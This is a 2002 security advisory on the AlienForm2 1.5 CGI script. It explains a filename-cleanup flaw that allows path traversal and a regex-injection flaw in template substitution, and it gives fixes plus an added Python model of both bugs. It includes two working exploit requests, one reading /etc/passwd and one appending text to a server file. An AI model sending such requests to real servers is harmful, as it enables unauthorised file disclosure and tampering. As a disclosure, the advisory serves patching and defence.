14th Jun 2002 [SBWID-5456]
COMMAND
AlienForm2 server file access (reading, writing)
SYSTEMS AFFECTED
AlienForm2 revision 1.5
PROBLEM
Nick Cleaton [nick@cleaton.net] found the following:
AlienForm2 by Jon Hedley is a template driven form processing Perl CGI
script. It is normally installed as af.cgi or alienform.cgi. Template
files on the server are used to configure the format of the output
document, the name of a log file and the format of the data to append
to the log file.
AlienForm2 is published under a licence that does not allow me to
reproduce parts of it here without permission, which I have been unable
to obtain. This advisory is best read in conjunction with a copy of
af.cgi.
The paths to the template files come from CGI inputs, and a flaw in the
code that cleans up those inputs allows any file on the server to be
used as a template file. The cleanup code replaces bad characters and
constructs with the empty string, and the input string ".|./" is
transformed by the cleanup code to "../".
The path cleanup code can be found on lines 185, 186, 197 and 198 of
af.cgi.
The name of a CGI input in square brackets in a template is replaced
with the value of that input. The regular expression which performs the
replacement is not resilient to regular expression metacharacters in
the name of a CGI input, allowing an attacker to take full control of
the contents of a template after CGI input substitution.
The CGI input substitution code can be found on line 246 of af.cgi.
Exploits
========
Arbitrary file disclosure:
GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
File writing:
This proof of concept exploit appends the text "hello there" to the
file /tmp/foo on the web server. It requires the existence of the file
/tmp/passwd, consisting of just the three lines:
root:*:0:0:Charlie &:/root:/bin/csh
httpd:*:1004:1004:Apache daemon:/:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
This exploit can be readily adapted to use any other file of two or
more lines in place of /tmp/passwd, and the file disclosure
vulnerability could be used to find a suitable file. That process could
be automated.
GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^httpd.*|x9=hello+there&x9|^nobody.*%0A|x9=
SOLUTION
Suggested Fix
=============
On lines 185 and 197, change [] to [_]
On lines 186 and 198, change // to /_/
On lines 246 and 248, change $key to \Q$key\E
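The following is an added Python model of the two weaknesses described in the PROBLEM section and of the fix suggested above; it is not af.cgi's code (whose licence forbids reproduction), and the filter patterns below are a constructed approximation of the described ".|./" to "../" behaviour, not the script's actual regexes.

```python
import re

def cleanup_flawed(path: str) -> str:
    """Single-pass filter that deletes forbidden tokens (constructed model).

    Deleting '|' splices its neighbours into a '..' that the earlier pass
    never saw, so '.|./' becomes '../'.
    """
    path = re.sub(r"\.\.", "", path)   # sees no '..' in '.|./'
    path = re.sub(r"\|", "", path)     # leaves '../' behind
    return path

def cleanup_fixed(path: str) -> str:
    """Same passes, but replacing with '_' as the advisory suggests.

    The replacement character keeps the neighbours apart, so no pass can
    manufacture a token for a later one.
    """
    path = re.sub(r"\.\.", "_", path)
    path = re.sub(r"\|", "_", path)
    return path

def substitute_unsafe(template: str, inputs: dict) -> str:
    """Template substitution with the raw CGI input name in the regex."""
    for key, value in inputs.items():
        template = re.sub(r"\[" + key + r"\]", value, template)
    return template

def substitute_fixed(template: str, inputs: dict) -> str:
    """re.escape() is Python's counterpart of Perl's \\Q$key\\E."""
    for key, value in inputs.items():
        template = re.sub(r"\[" + re.escape(key) + r"\]", value, template)
    return template

# Constructed template: only the bracketed names should ever be replaced.
TEMPLATE = "To: [email]\nBody: [msg]\n"

if __name__ == "__main__":
    print(cleanup_flawed(".|./.|./etc/passwd"))   # traversal survives
    print(cleanup_fixed(".|./.|./etc/passwd"))    # traversal neutralised
    # A key containing regex metacharacters clobbers the whole template
    print(substitute_unsafe(TEMPLATE, {"email|.*": "X"}))
    # Escaped key: the hostile name simply matches nothing
    print(substitute_fixed(TEMPLATE, {"email|.*": "X"}))
```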